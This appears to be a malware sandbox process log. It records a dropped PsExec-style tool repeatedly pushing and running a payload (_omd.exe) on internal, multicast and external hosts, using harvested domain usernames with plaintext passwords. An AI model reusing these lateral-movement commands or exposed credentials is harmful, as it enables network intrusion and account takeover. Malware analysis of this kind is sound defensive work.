C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2552
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:1160
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:752
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:1800
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3796
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4148
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:2152
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1424
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1308
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:4844
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:1420
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3432
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2184
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:4636
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4532
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:4852
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1268
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:1160
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:752
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1800
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:3796
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3124
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4156
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:2348
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:4936
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:1936
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4612
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:792
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:2296
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:3000
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:3732
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:4040
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\static.208.169.12.49.clients.your-server.de -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3680
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2948
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:2476
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5016
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2344
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:3760
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5028
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3828
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3064
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3228
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4156
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:5048
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3568
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4840
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:416
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:4920
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:3644
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4608
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3432
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:3732
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3508
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2948
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:3276
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:1804
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:700
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:2956
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2404
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3932
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3756
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:5108
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3520
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4916
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1936
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4164
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:792
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:4408
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3316
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:1296
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2476
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:1268
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1804
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1424
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:1264
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:1440
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:760
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4900
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4440
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2364
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\49.12.169.208 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2368
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2148
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\static.208.169.12.49.clients.your-server.de -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵PID:4292
-
-
